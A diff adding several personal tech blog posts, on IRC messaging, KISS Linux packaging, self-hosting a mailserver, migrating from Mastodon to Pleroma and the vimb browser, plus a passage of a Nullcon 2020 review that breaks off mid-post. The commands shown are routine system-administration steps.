+     __________________________________________________________________
+
+    1. [3]https://darknetdiaries.com/episode/51/ -- Jack talks about
+       Indian hackers who operate on Instagram.
+
+References
+
+   1. https://icyphox.sh/home/icy/leet/site/build/blog/ig-opsec/temp.html#fn:ddepisode
+   2. https://help.instagram.com/494561080557017
+   3. https://darknetdiaries.com/episode/51/

@@ -0,0 +1,43 @@ 
+   28 October, 2019
+
+The intelligence conundrum
+
+To protect an asset, or to protect the people?
+
+   I watched the latest [1]S.W.A.T.) episode a couple of days ago, and it
+   highlighted some interesting issues that intelligence organizations
+   face when working with law enforcement. Side note: it's a pretty good
+   show if you like police procedurals.
+
+The problem
+
+   Consider the following scenario:
+     * There's a local drug lord who's been recruited to provide intel, by
+       a certain 3-letter organization.
+     * Local PD busts his operation and proceed to arrest him.
+     * 3-letter org steps in, wants him released.
+
+   So here's the thing, his presence is a threat to public but at the same
+   time, he can be a valuable long term asset -- giving info on drug
+   inflow, exchanges and perhaps even actionable intel on bigger fish who
+   exist on top of the ladder. But he also seeks security. The 3-letter
+   org must provide him with protection, in case he's blown. And like in
+   our case, they'd have to step in if he gets arrested.
+
+   Herein lies the problem. How far should an intelligence organization go
+   to protect an asset? Who matters more, the people they've sworn to
+   protect, or the asset? Because afterall, in the bigger picture, local
+   PD and intel orgs are on the same side.
+
+   Thus, the question arises -- how can we measure the "usefulness" of an
+   asset to better quantify the tradeoff that is to be made? Is the intel
+   gained worth the loss of public safety? This question remains largely
+   unanswered, and is quite the predicament should you find yourself in
+   it.
+
+   This was a fairly short post, but an interesting problem to ponder
+   nonetheless.
+
+References
+
+   1. https://en.wikipedia.org/wiki/S.W.A.T._(2017_TV_series

@@ -0,0 +1,99 @@ 
+   03 November, 2019
+
+IRC for DMs
+
+Honestly, it's pretty great
+
+   [1]Nerdy and I decided to try and use IRC for our daily communications,
+   as opposed to non-free alternatives like WhatsApp or Telegram. This is
+   an account of how that went.
+
+The status quo of instant messaging apps
+
+   I've tried a ton of messaging applications -- Signal, WhatsApp,
+   Telegram, Wire, Jami (Ring), Matrix, Slack, Discord and more recently,
+   DeltaChat.
+
+   Signal: It straight up sucks on Android. Not to mention the centralized
+   architecture, and OWS's refusal to federate.
+
+   WhatsApp: Facebook's spyware that people use without a second thought.
+   The sole reason I have it installed is for University's class groups; I
+   can't wait to graduate.
+
+   Telegram: Centralized architecture and a closed-source server. It's got
+   a very nice Android client, though.
+
+   Jami: Distributed platform, free software. I am not going to comment on
+   this because I don't recall what my experience was like, but I'm not
+   using it now... so if that's indicative of anything.
+
+   Matrix (Riot): Distributed network. Multiple client implementations.
+   Overall, pretty great, but it's slow. I've had messages not send / not
+   received a lot of times. Matrix + Riot excels in group communication,
+   but really sucks for one-to-one chats.
+
+   Slack / Discord: sigh
+
+   DeltaChat: Pretty interesting idea -- on paper. Using existing email
+   infrastructure for IM sounds great, but it isn't all that cash in
+   practice. Email isn't instant, there's always a delay of give or take 5
+   to 10 seconds, if not more. This affects the flow of conversation. I
+   might write a small blog post later, revewing DeltaChat.^[2]1
+
+Why IRC?
+
+   It's free, in all senses of the word. A lot of others have done a great
+   job of answering this question in further detail, this is by far my
+   favourite:
+
+   [3]https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html
+
+Using IRC's private messages
+
+   This was the next obvious choice, but personal message buffers don't
+   persist in ZNC and it's very annoying to have to do a /query
+   nerdypepper (Weechat) or to search and message a user via Revolution
+   IRC. The only unexplored option -- using a channel.
+
+Setting up a channel for DMs
+
+   A fairly easy process:
+     * Set modes (on Rizon)^[4]2:
+#crimson [+ilnpstz 3]
+
+       In essence, this limits the users to 3 (one bot), sets the channel
+       to invite only, hides the channel from /whois and /list, and a few
+       other misc. modes.
+     * Notifications: Also a trivial task; a quick modification to
+       [5]lnotify.py to send a notification for all messages in the
+       specified buffer (#crimson) did the trick for Weechat. Revolution
+       IRC, on the other hand, has an option to setup rules for
+       notifications -- super convenient.
+     * A bot: Lastly, a bot for a few small tasks -- fetching URL titles,
+       responding to .np (now playing) etc. Writing an IRC bot is dead
+       simple, and it took me about an hour or two to get most of the
+       basic functionality in place. The source is [6]here. It is by no
+       means "good code"; it breaks spectacularly from time to time.
+
+In conclusion
+
+   As the subtitle suggests, using IRC has been great. It's probably not
+   for everyone though, but it fits my (and Nerdy's) usecase perfectly.
+
+   P.S.: I'm not sure why the footnotes are reversed.
+     __________________________________________________________________
+
+    1. It's in [7]queue.
+    2. Channel modes on [8]Rizon.
+
+References
+
+   1. https://nerdypepper.me/
+   2. https://icyphox.sh/home/icy/leet/site/build/blog/irc-for-dms/temp.html#fn:deltachat
+   3. https://drewdevault.com/2019/07/01/Absence-of-features-in-IRC.html
+   4. https://icyphox.sh/home/icy/leet/site/build/blog/irc-for-dms/temp.html#fn:modes
+   5. https://weechat.org/scripts/source/lnotify.py.html/
+   6. https://github.com/icyphox/detotated
+   7. https://github.com/icyphox/site/issues/10
+   8. https://wiki.rizon.net/index.php?title=Channel_Modes

@@ -0,0 +1,134 @@ 
+   03 April, 2020
+
+The Zen of KISS Linux
+
+My thoughts on the distro, the philosophy and my experience in general
+
+   [1]I installed KISS early in January on my main machine -- an HP Envy
+   13 (2017), and I have since noticed a lot of changes in my workflow, my
+   approach to software (and its development), and in life as a whole. I
+   wouldn't call KISS "life changing", as that would be overly dramatic,
+   but it has definitely reshaped my outlook towards technology -- for
+   better or worse.
+
+   When I talk about KISS to people -- online or IRL---I get some pretty
+   interesting reactions and comments.^[2]1 Ranging from "Oh cool." to
+   "You must be retarded.", I've heard it all. A classic and a personal
+   favourite of mine, "I don't use meme distros because I actually get
+   work done." It is actually, quite the opposite -- I've been so much
+   more productive using KISS than any other operating system. I'll
+   explain why shortly.
+
+   The beauty of this "distro", is it isn't much of a distribution at all.
+   There is no big team, no mailing lists, no infrastructure. The entire
+   setup is so loose, and this makes it very convenient to swap things out
+   for alternatives. The main (and potentially community) repos all reside
+   locally on your system. In the event that Dylan decides to call it
+   quits and switches to Windows, we can simply just bump versions
+   ourselves, locally! The [3]KISS Guidestones document is a good read.
+
+   In the subseqent paragraphs, I've laid out the different things about
+   KISS that stand out to me, and make using the system a lot more
+   enjoyable.
+
+the package system
+
+   Packaging for KISS has been delightful, to say the least. It takes me
+   about 2 mins to write and publish a new package. Here's the radare2
+   package, which I maintain, for example.
+
+   The build file (executable):
+#!/bin/sh -e
+
+./configure \
+    --prefix=/usr
+
+make
+make DESTDIR="$1" install
+
+   The version file:
+4.3.1 1
+
+   The checksums file (generated using kiss checksum radare2):
+4abcb9c9dff24eab44d64d392e115ae774ab1ad90d04f2c983d96d7d7f9476aa  4.3.1.tar.gz
+
+   And finally, the sources file:
+https://github.com/radareorg/radare2/archive/4.3.1.tar.gz
+
+   This is literally the bare minimum that you need to define a package.
+   There's also the depends file where you specify the dependencies for
+   your package. kiss also generates a manifests file to track all the
+   files and directories that your package creates during installation,
+   for their removal, if and when that occurs. Now compare this process
+   with any other distribution's.
+
+the community
+
+   As far as I know, it mostly consists of the #kisslinux channel on
+   Freenode and the [4]r/kisslinux subreddit. It's not that big, but it's
+   suprisingly active, and super helpful. There have been some interested
+   new KISS-related projects too: [5]kiss-games -- a repository for, well,
+   Linux games; [6]kiss-ppc64le and [7]kiss-aarch64 -- KISS Linux ports
+   for PowerPC and ARM64 architectures; [8]wyvertux -- an attempt at a
+   GNU-free Linux distribution, using KISS as a base; and tons more.
+
+the philosophy
+
+   Software today is far too complex. And its complexity is only growing.
+   Some might argue that this is inevitable, and it is in fact progress. I
+   disagree. Blindly adding layers and layers of abstraction (Docker,
+   modern web "apps") isn't progress. Look at the Linux desktop ecosystem
+   today, for example -- monstrosities like GNOME and KDE are a result of
+   this...new wave software engineering.
+
+   I see KISS as a symbol of defiance against this malformed notion. You
+   don't need all the bloat these DEs ship with to have a usable system.
+   Agreed, it's a bit more effort to get up and running, but it is
+   entirely worth it. Think of it as a clean table -- feels good to sit
+   down and work on, doesn't it?
+
+   Let's take my own experience, for example. One of the initial few
+   software I used to install on a new system was dunst -- a notification
+   daemon. Unfortunately, it depends on D-Bus, which is Poetterware; ergo,
+   not on KISS. However, using a system without notifications has been
+   very pleasant. Nothing to distract you while you're in the zone.
+
+   Another instance, again involving D-Bus (or not), is Bluetooth audio.
+   As it happens, my laptop's 3.5mm jack is rekt, and I need to use
+   Bluetooth for audio, if at all. Sadly, Bluetooth audio on Linux
+   hard-depends on D-Bus. Bluetooth stacks that don't rely on D-Bus do
+   exist, like on Android, but porting them over to desktop is
+   non-trivial. However, I used this to my advantage and decided not to
+   consume media on my laptop. This has drastically boosted my
+   productivity, since I literally cannot watch YouTube even if I wanted
+   to. My laptop is now strictly work-only. If I do need to watch the
+   occasional video / listen to music, I use my phone. Compartmentalizing
+   work and play to separate devices has worked out pretty well for me.
+
+   I'm slowly noticing myself favor low-tech (or no-tech) solutions to
+   simple problems too. Like notetaking -- I've tried plaintext files, Vim
+   Wiki, Markdown, but nothing beats actually using pen and paper. Tech,
+   from what I can see, doesn't solve problems very effectively. In some
+   cases, it only causes more of them. I might write another post
+   discussing my thoughts on this in further detail.
+
+   I'm not sure what I intended this post to be, but I'm pretty happy with
+   the mindspill. To conclude this already long monologue, let me clarify
+   one little thing y'all are probably thinking, "Okay man, are you
+   suggesting that we regress to the Dark Ages?". No, I'm not suggesting
+   that we regress, but rather, progress mindfully.
+     __________________________________________________________________
+
+    1. No, I don't go "I use KISS btw". I don't bring it up unless
+       provoked.
+
+References
+
+   1. https://icyphox.sh/blog/five-days-tty
+   2. https://icyphox.sh/home/icy/leet/site/build/blog/kiss-zen/temp.html#fn:bringing-up-kiss
+   3. https://k1ss.org/guidestones
+   4. https://old.reddit.com/r/kisslinux
+   5. https://github.com/sdsddsd1/kiss-games
+   6. https://github.com/jedavies-dev/kiss-ppc64le
+   7. https://github.com/jedavies-dev/kiss-aarch64
+   8. https://github.com/wyvertux/wyvertux

@@ -0,0 +1,69 @@ 
+   29 March, 2020
+
+Introducing mael
+
+An experimental mail client
+
+   Update: The code lives here: [1]https://github.com/icyphox/mael
+
+   I've been on the lookout for a good terminal-based email client since
+   forever, and I've tried almost all of them. The one I use right now
+   sucks a little less -- [2]aerc. I have some gripes with it though, like
+   the problem with outgoing emails not getting copied to the Sent folder,
+   and instead erroring out with a cryptic EOF -- that's literally all it
+   says. I've tried mutt, but I find it a little excessive. It feels like
+   the weechat of email -- to many features that you'll probably never
+   use.
+
+   I need something clean and simple, less bloated (for the lack of a
+   better term). This is what motivated me to try writing my own. The
+   result of this (and not to mention, being holed up at home with nothing
+   better to do), is mael.^[3]1
+
+   mael isn't like your usual TUI clients. I envision this to turn out
+   similar to mailx -- a prompt-based UI. The reason behind this UX
+   decision is simple: it's easier for me to write. :)
+
+   Speaking of writing it, it's being written in a mix of Python and bash.
+   Why? Because Python's email and mailbox modules are fantastic, and I
+   don't think I want to parse Maildirs in bash. "But why not pure
+   Python?" Well, I'm going to be shelling out a lot (more on this in a
+   bit), and writing interactive UIs in bash is a lot more intuitive,
+   thanks to some of the nifty features that later versions of bash have
+   -- read, mapfile etc.
+
+   The reason I'm shelling out is because two key components to this
+   client, that I haven't yet talked about -- mbsync and msmtp are in use,
+   for IMAP and SMTP respectively. And mbsync uses the Maildir format,
+   which is why I'm relying on Python's mailbox package. Why is this in
+   the standard library anyway?!
+
+   The architecture of the client is pretty interesting (and possibly very
+   stupid), but here's what happens:
+     * UI and prompt stuff in bash
+     * emails are read using less
+     * email templates (RFC 2822) are parsed and generated in Python
+     * this is sent to bash in STDOUT, like
+
+msg="$(./mael-parser "$maildir_message_path")"
+
+   These kind of one-way (bash -> Python) calls are what drive the entire
+   process. I'm not sure what to think of it. Perhaps I might just give up
+   and write the entire thing in Python. Or...I might just scrap this
+   entirely and just shut up and use aerc. I don't know yet. The code does
+   seem to be growing in size rapidly. It's about ~350 LOC in two days of
+   writing (Python + bash). New problems arise every now and then and it's
+   pretty hard to keep track of all of this. It'll be cool when it's all
+   done though (I think).
+
+   If only things just worked.
+     __________________________________________________________________
+
+    1. I have yet to open source it; this post will be updated with a link
+       to it when I do.
+
+References
+
+   1. https://github.com/icyphox/mael
+   2. https://git.sr.ht/~sircmpwn/aerc
+   3. https://icyphox.sh/home/icy/leet/site/build/blog/mael/temp.html#fn:oss

@@ -0,0 +1,162 @@ 
+   15 August, 2019
+
+Setting up my personal mailserver
+
+This is probably a terrible idea...
+
+   A mailserver was a long time coming. I'd made an attempt at setting one
+   up around ~4 years ago (ish), and IIRC, I quit when it came to DNS. And
+   I almost did this time too.^[1]1
+
+   For this attempt, I wanted a simpler approach. I recall how terribly
+   confusing Dovecot & Postfix were to configure and hence I decided to
+   look for a containerized solution, that most importantly, runs on my
+   cheap $5 Digital Ocean VPS -- 1 vCPU and 1 GB memory. Of which only
+   around 500 MB is actually available. So yeah, pretty tight.
+
+What's available
+
+   Turns out, there are quite a few of these OOTB, ready to deply
+   solutions. These are the ones I came across:
+     * [2]poste.io: Based on an "open core" model. The base install is
+       open source and free (as in beer), but you'll have to pay for the
+       extra stuff.
+     * [3]mailu.io: Free software. Draws inspiration from poste.io, but
+       ships with a web UI that I didn't need.
+     * [4]mailcow.email: These fancy domains are getting ridiculous. But
+       more importantly they need 2 GiB of RAM plus swap?! Nope.
+     * [5]Mail-in-a-Box: Unlike the ones above, not a Docker-based
+       solution but definitely worth a mention. It however, needs a fresh
+       box to work with. A box with absolutely nothing else on it. I can't
+       afford to do that.
+     * [6]docker-mailserver: The winner.
+
+So... docker-mailserver
+
+   The first thing that caught my eye in the README:
+
+     Recommended:
+     * 1 CPU
+     * 1GB RAM
+
+     Minimum:
+     * 1 CPU
+     * 512MB RAM
+
+   Fantastic, I can somehow squeeze this into my existing VPS. Setup was
+   fairly simple & the docs are pretty good. It employs a single .env file
+   for configuration, which is great. However, I did run into a couple of
+   hiccups here and there.
+
+   One especially nasty one was docker / docker-compose running out of
+   memory.
+Error response from daemon: cannot stop container: 2377e5c0b456: Cannot kill con
+tainer 2377e5c0b456226ecaa66a5ac18071fc5885b8a9912feeefb07593638b9a40d1: OCI run
+time state failed: runc did not terminate sucessfully: fatal error: runtime: out
+ of memory
+
+   But it eventually worked after a couple of attempts.
+
+   The next thing I struggled with -- DNS. Specifically, the with the step
+   where the DKIM keys are generated^[7]2. The output under
+   config/opendkim/keys/domain.tld/mail.txt
+   isn't exactly CloudFlare friendly; they can't be directly copy-pasted
+   into a TXT record.
+
+   This is what it looks like.
+mail._domainkey IN      TXT     ( "v=DKIM1; h=sha256; k=rsa; "
+          "p=<key>"
+          "<more key>" )  ;  -- -- DKIM key mail for icyphox.sh
+
+   But while configuring the record, you set "Type" to TXT, "Name" to
+   mail._domainkey, and the "Value" to what's inside the parenthesis ( ),
+   removing the quotes "". Also remove the part that appears to be a
+   comment ; -- -- ....
+
+   To simplify debugging DNS issues later, it's probably a good idea to
+   point to your mailserver using a subdomain like mail.domain.tld using
+   an A record. You'll then have to set an MX record with the "Name" as @
+   (or whatever your DNS provider uses to denote the root domain) and the
+   "Value" to mail.domain.tld. And finally, the PTR (pointer record, I
+   think), which is the reverse of your A record -- "Name" as the server
+   IP and "Value" as mail.domain.tld. I learnt this part the hard way,
+   when my outgoing email kept getting rejected by Tutanota's servers.
+
+   Yet another hurdle -- SSL/TLS certificates. This isn't very properly
+   documented, unless you read through the [8]wiki and look at an example.
+   In short, install certbot, have port 80 free, and run
+$ certbot certonly --standalone -d mail.domain.tld
+
+   Once that's done, edit the docker-compose.yml file to mount
+   /etc/letsencrypt in the container, something like so:
+...
+
+volumes:
+    - maildata:/var/mail
+    - mailstate:/var/mail-state
+    - ./config/:/tmp/docker-mailserver/
+    - /etc/letsencrypt:/etc/letsencrypt
+
+...
+
+   With this done, you shouldn't have mail clients complaining about wonky
+   certs for which you'll have to add an exception manually.
+
+Why would you...?
+
+   There are a few good reasons for this:
+
+Privacy
+
+   No really, this is the best choice for truly private email. Not
+   ProtonMail, not Tutanota. Sure, they claim so and I don't dispute it.
+   Quoting Drew Devault^[9]3,
+
+     Truly secure systems do not require you to trust the service
+     provider.
+
+   But you have to trust ProtonMail. They run open source software, but
+   how can you really be sure that it isn't a backdoored version of it?
+
+   When you host your own mailserver, you truly own your email without
+   having to rely on any third-party. This isn't an attempt to spread FUD.
+   In the end, it all depends on your threat model(TM).
+
+Decentralization
+
+   Email today is basically run by Google. Gmail has over 1.2 billion
+   active users. That's obscene. Email was designed to be decentralized
+   but big corps swooped in and made it a product. They now control your
+   data, and it isn't unknown that Google reads your mail. This again
+   loops back to my previous point, privacy. Decentralization guarantees
+   privacy. When you control your mail, you subsequently control who reads
+   it.
+
+Personalization
+
+   Can't ignore this one. It's cool to have a custom email address to
+   flex.
+
+   x@icyphox.sh vs gabe.newell4321@gmail.com
+
+   Pfft, this is no competition.
+     __________________________________________________________________
+
+    1. My [10]tweet of frustration.
+    2. [11]Link to step in the docs.
+    3. From his [12]article on why he doesn't trust Signal.
+
+References
+
+   1. https://icyphox.sh/home/icy/leet/site/build/blog/mailserver/temp.html#fn:1
+   2. https://poste.io/
+   3. https://mailu.io/
+   4. https://mailcow.email/
+   5. https://mailinabox.email/
+   6. https://github.com/tomav/docker-mailserver/
+   7. https://icyphox.sh/home/icy/leet/site/build/blog/mailserver/temp.html#fn:2
+   8. https://github.com/tomav/docker-mailserver/wiki/Installation-Examples
+   9. https://icyphox.sh/home/icy/leet/site/build/blog/mailserver/temp.html#fn:3
+  10. https://twitter.com/icyphox/status/1161648321548566528
+  11. https://github.com/tomav/docker-mailserver#generate-dkim-keys
+  12. https://drewdevault.com/2018/08/08/Signal.html

@@ -0,0 +1,53 @@ 
+   05 May, 2020
+
+Stop joining mastodon.social
+
+Do you even understand federation?
+
+   No, really. Do you actually understand why the Mastodon network exists,
+   and what it stands for, or are you just LARPing? If you're going to
+   just cross-post from Twitter, why are you even on Mastodon?
+
+   Okay, so Mastodon is a "federated network". What does that mean? You
+   have a bunch of instances, each having their own userbase, and each
+   instance federates with other instances, forming a distributed network.
+   Got that? Cool. Now let's get to the problem with mastodon.social.
+
+   mastodon.social is the instance run by the lead developer. Why does
+   everybody flock to it? I'm really not sure, but if I were to hazard a
+   guess, I'd say it's because people don't really understand federation.
+   "Oh, big instance? I should probably join that." Herd mentality? I
+   dunno.
+
+   And what happens when every damn user joins just one instance? It
+   becomes more Twitter, that's what. The federation is gone. Nearly all
+   activity is generated from just one instance. Here are some numbers:
+     * Total number of users on Mastodon: ~2.2 million.
+     * Number of users on mastodon.social: 529923
+
+   Surprisingly, there's an instance even bigger than mastodon.social --
+   pawoo.net. I have no idea why it's so big and it's primarily Japanese.
+   Its user count is over 620k. So mastodon.social and pawoo.net put
+   together form over 1 million users, that's more than 50% of the entire
+   Mastodon populace. That's nuts.^[1]1
+
+   And you're only enabling this centralization by joining
+   mastodon.social! Really, what even is there on mastodon.social? Have
+   you even seen its local timeline? Probably not. Join an instance with
+   more flavor. Are you into, say, the BSDs? Join bsd.network. Free
+   software? fosstodon.org. Or host your own for yourself and your
+   friends.
+
+   If you really do care about decentralization and freedom, and aren't
+   just memeing to look cool on Twitter, then move your account to another
+   instance.^[2]2
+     __________________________________________________________________
+
+    1. [3]https://rosenzweig.io/blog/the-federation-fallacy.html
+    2. Go to /settings/migration from your instance's web page.
+
+References
+
+   1. https://icyphox.sh/home/icy/leet/site/build/blog/mastodon-social/temp.html#fn:federation-fallacy
+   2. https://icyphox.sh/home/icy/leet/site/build/blog/mastodon-social/temp.html#fn:move-account
+   3. https://rosenzweig.io/blog/the-federation-fallacy.html

@@ -0,0 +1,73 @@ 
+   04 September, 2020
+
+Migrating from Mastodon to Pleroma
+
+Mastodon bad. Pleroma good.
+
+   If you've been following me on the fediverse, you would've witnessed my
+   numerous (failed) attempts at migrating from Mastodon to Pleroma,
+   running on my Raspberry Pi. I finally got it working, and these are the
+   steps I took. It's sort of a loose guide you could follow, but I can't
+   promise it'll work for you.
+
+   The Erlang and Elixir packages are pretty broken and outdated on
+   Raspbian. So this time, I built them from source.^[1]1^[2]2 I also
+   assume you have Mastodon and Pleroma (source, not OTP) installed --
+   probably at /home/mastodon/live and /opt/pleroma, respectively.
+
+   Once you have Erlang and Elixir compiled and sitting in your PATH, pull
+   [3]soapbox-pub/migrator. Now read the readme and the do_migration.sh
+   script to get an idea of what you're getting into.
+
+   Move into the cloned directory and create a .env:
+MASTODON_PATH=/home/mastodon/live
+PLEROMA_PATH=/opt/pleroma
+
+   Then, run:
+$ yarn   # install deps
+$ cp -r mastodon/* /home/mastodon/live
+$ cp -r pleroma/* /opt/pleroma
+$ RAILS_ENV=production yarn masto export
+
+   If you run into any permissions issues, chown and proceed. This should
+   export all your Mastodon activity into /home/mastodon/live/migrator.
+   Now, copy the migrator directory into your Pleroma installation path.
+$ cp -r migrator /opt/pleroma
+
+   You can then import all of it into Pleroma (possibly prefixed with sudo
+   -Hu pleroma):
+$ MIX_ENV=prod mix migrator.import
+
+   If all went well, you would've successfully migrated from Mastodon to
+   Pleroma. If not, well feel free to send me an email (or @ me on the
+   fedi). I suppose you could also reach [4]Alex -- he's the incredibly
+   based guy who wrote the migrator, [5]soapbox-fe and does some Elixir
+   magic he keeps [6]posting about.
+
+   Rest assured, the migrator has a 100% success rate -- Alex and I are
+   apparently the only two who have it working. ^2/[2].
+
+why should you migrate?
+
+   Because Pleroma is cleaner, leaner^[7]3 and prettier looking^[8]4. Oh,
+   and we have chats. screenshot of pleroma + soapbox-fe
+     __________________________________________________________________
+
+    1. [9]Erlang install guide
+    2. [10]Elixir install guide
+    3. Mastodon used about ~2.5 GB out of the 4 I have on my Pi. With
+       Pleroma, the total used RAM is only about ~700 MB. That's crazy!
+    4. ...with Soapbox. :^)
+
+References
+
+   1. https://icyphox.sh/home/icy/leet/site/build/blog/mastodon-to-pleroma/temp.html#fn:1
+   2. https://icyphox.sh/home/icy/leet/site/build/blog/mastodon-to-pleroma/temp.html#fn:2
+   3. https://gitlab.com/soapbox-pub/migrator
+   4. https://alexgleason.me/
+   5. https://soapbox.pub/
+   6. https://gleasonator.com/@alex
+   7. https://icyphox.sh/home/icy/leet/site/build/blog/mastodon-to-pleroma/temp.html#fn:3
+   8. https://icyphox.sh/home/icy/leet/site/build/blog/mastodon-to-pleroma/temp.html#fn:4
+   9. http://erlang.org/doc/installation_guide/INSTALL.html
+  10. https://elixir-lang.org/install.html#compiling-from-source-unix-and-mingw

@@ -0,0 +1,65 @@ 
+   16 January, 2020
+
+Vimb: my Firefox replacement
+
+Web browsing, suckless style
+
+   After having recently installed [1]KISS, and building Firefox from
+   source, I was exposed to the true monstrosity that Firefox -- and web
+   browsers in general---is. It took all of 9 hours to build the
+   dependencies and then Firefox itself.
+
+   Sure, KISS now ships Firefox binaries in the [2]firefox-bin package; I
+   decided to get rid of that slow mess anyway.
+
+Enter vimb
+
+   [3]vimb is a browser based on [4]webkit2gtk, with a Vim-like interface.
+   webkit2gtk builds in less than a minute -- it blows Firefox out of the
+   water, on that front.
+
+   There isn't much of a UI to it -- if you've used Vimperator/Pentadactyl
+   (Firefox plugins), vimb should look familiar to you. It can be
+   configured via a config.h or a text based config file at
+   ~/.config/vimb/config. Each "tab" opens a new instance of vimb, in a
+   new window but this can get messy really fast if you have a lot of tabs
+   open.
+
+Enter tabbed
+
+   [5]tabbed is a tool to embed X apps which support xembed into a tabbed
+   UI. This can be used in conjunction with vimb, like so:
+tabbed vimb -e
+
+   Where the -e flag is populated with the XID, by tabbed. Configuring
+   Firefox-esque keybinds in tabbed's config.h is relatively easy. Once
+   that's done -- voilà! A fairly sane, Vim-like browsing experience
+   that's faster and has a smaller footprint than Firefox.
+
+Ad blocking
+
+   Ad blocking support isn't built-in and there is no plugin system
+   available. There are two options for ad blocking:
+    1. [6]wyebadblock
+    2. /etc/hosts
+
+Caveats
+
+   Some websites tend to not work because they detect vimb as an older
+   version of Safari (same web engine). This is a minor inconvenience, and
+   not a dealbreaker for me. I also cannot login to Google's services for
+   some reason, which is mildly annoying, but it's good in a way -- I am
+   now further incentivised to dispose of my Google account.
+
+   And here's the screenshot y'all were waiting for:
+
+   vimb
+
+References
+
+   1. https://getkiss.org/
+   2. https://github.com/kisslinux/repo/tree/master/extra/firefox-bin
+   3. https://fanglingsu.github.io/vimb/
+   4. https://webkitgtk.org/
+   5. https://tools.suckless.org/tabbed/
+   6. https://github.com/jun7/wyebadblock

@@ -0,0 +1,87 @@ 
+   13 May, 2019
+
+My setup
+
+My daily drivers---hardware, software and workflow
+
+Hardware
+
+   The only computer I have with me is my [1]HP Envy 13 (2018) (my model
+   looks a little different). It's a 13" ultrabook, with an i5 8250u, 8
+   gigs of RAM and a 256 GB NVMe SSD. It's a very comfy machine that does
+   everything I need it to.
+
+   For my phone, I use a [2]OnePlus 6T, running stock [3]OxygenOS. As of
+   this writing, its bootloader hasn't been unlocked and nor has the
+   device been rooted. I'm also a proud owner of a [4]Nexus 5, which I
+   really wish Google rebooted. It's surprisingly still usable and runs
+   Android Pie, although the SIM slot is ruined and the battery backup is
+   abysmal.
+
+   My watch is a [5]Samsung Gear S3 Frontier. Tizen is definitely better
+   than Android Wear.
+
+   My keyboard, although not with me in college, is a very old [6]Dell
+   SK-8110. For the little bit of gaming that I do, I use a [7]HP m150
+   gaming mouse. It's the perfect size (and color).
+
+   For my music, I use the [8]Bose SoundLink II. Great pair of headphones,
+   although the ear cups need replacing.
+
+And the software
+
+   [DEL: My distro of choice for the past ~1 year has been [9]elementary
+   OS. I used to be an Arch Linux elitist, complete with an esoteric
+   window manager, all riced. I now use whatever JustWorks(TM). :DEL]
+
+   Update: As of June 2019, I've switched over to a vanilla Debian 9
+   Stretch install, running [10]i3 as my window manager. If you want, you
+   can dig through my configs at my [11]dotfiles repo.
+
+   Here's a (riced) screenshot of my desktop.
+
+   scrot
+
+   Most of my work is done in either the browser, or the terminal. My
+   shell is pure [12]zsh, as in no plugin frameworks. It's customized
+   using built-in zsh functions. Yes, you don't actually need a framework.
+   It's useless bloat. The prompt itself is generated using a framework I
+   built in [13]Nim -- [14]nicy. My primary text editor is [15]nvim.
+   Again, all configs in my dotfiles repo linked above. I manage all my
+   passwords using [16]pass(1), and I use [17]rofi-pass to access them via
+   rofi.
+
+   Most of my security tooling is typically run via a Kali Linux docker
+   container. This is convenient for many reasons, keeps your global
+   namespace clean and a single command to drop into a Kali shell.
+
+   I use a DigitalOcean droplet (BLR1) as a public filehost, found at
+   [18]x.icyphox.sh. The UI is the wonderful [19]serve, by [20]ZEIT. The
+   same box also serves as my IRC bouncer and OpenVPN (TCP), which I
+   tunnel via SSH running on 443. Campus firewall woes.
+
+   I plan on converting my desktop back at home into a homeserver setup.
+   Soon(TM).
+
+References
+
+   1. https://store.hp.com/us/en/mdp/laptops/envy-13
+   2. https://www.oneplus.in/6t
+   3. https://www.oneplus.in/oxygenos
+   4. https://en.wikipedia.org/wiki/Nexus_5
+   5. https://www.samsung.com/in/wearables/gear-s3-frontier-r760/
+   6. https://www.amazon.com/Dell-Keyboard-Model-SK-8110-Interface/dp/B00366HMMO
+   7. https://www.hpshopping.in/hp-m150-gaming-mouse-3dr63pa.html
+   8. https://www.boseindia.com/en_in/products/headphones/over_ear_headphones/soundlink-around-ear-wireless-headphones-ii.html
+   9. https://elementary.io/
+  10. https://i3wm.org/
+  11. https://github.com/icyphox/dotfiles
+  12. http://www.zsh.org/
+  13. https://nim-lang.org/
+  14. https://github.com/icyphox/nicy
+  15. https://neovim.org/
+  16. https://passwordstore.org/
+  17. https://github.com/carnager/rofi-pass
+  18. https://x.icyphox.sh/
+  19. https://github.com/zeit/serve
+  20. https://zeit.co/

@@ -0,0 +1,101 @@ 
+   09 March, 2020
+
+Nullcon 2020
+
+An opinion-filled review of Nullcon Goa, 2020
+
+   Disclaimer: Political.
+
+   This year's conference was at the Taj Hotel and Convention center, Dona
+   Paula, and its associated party at Cidade de Goa, also by Taj. Great
+   choice of venue, perhaps even better than last time. The food was fine,
+   the views were better.
+
+   With those things out of the way -- let's talk talks. I think I
+   preferred the panels to the talks -- I enjoy a good, stimulating
+   discussion as opposed to only half-understanding a deeply technical
+   talk -- but that's just me. But there was this one talk that I really
+   enjoyed, perhaps due to its unintended comedic value; I'll get into
+   that later.
+
+   The list of panels/talks I attended in order:
+
+   Day 1
+     * Keynote: The Metadata Trap by Micah Lee (Talk)
+     * Securing the Human Factor (Panel)
+     * Predicting Danger: Building the Ideal Threat Intelligence Model
+       (Panel)
+     * Lessons from the Cyber Trenches (Panel)
+     * Mlw 41#: a new sophisticated loader by APT group TA505 by Alexey
+       Vishnyakov (Talk)
+     * Taking the guess out of Glitching by Adam Laurie (Talk)
+     * Keynote: Cybersecurity in India -- Information Assymetry, Cross
+       Border Threats and National Sovereignty by Saumil Shah (Talk)
+
+   Day 2
+     * Keynote: Crouching hacker, killer robot? Removing fear from
+       cyber-physical security by Stefano Zanero (Talk)
+     * Supply Chain Security in Critical Infrastructure Systems (Panel)
+     * Putting it all together: building an iOS jailbreak from scratch by
+       Umang Raghuvanshi (Talk)
+     * Hack the Law: Protection for Ethical Cyber Security Research in
+       India (Panel)
+
+Re: Closing keynote
+
+   I wish I could link the talk, but it hasn't been uploaded just yet.
+   I'll do it once it has. So, I've a few comments I'd like to make on
+   some of Saumil's statements.
+
+   He proposed that the security industry trust the user more, and let
+   them make the decisions pertaining to personal security / privacy.
+   Except...that's just not going to happen. If all users were capable of
+   making good, security-first choices -- we as an industry don't need to
+   exist. But that is unfortunately not the case. Users are dumb. They
+   value convenience and immediacy over security. That's the sad truth of
+   the modern age.
+
+   Another thing he proposed was that the Indian Government build our own
+   "Military Grade" and "Consumer Grade" encryption.
+
+   ...what?
+
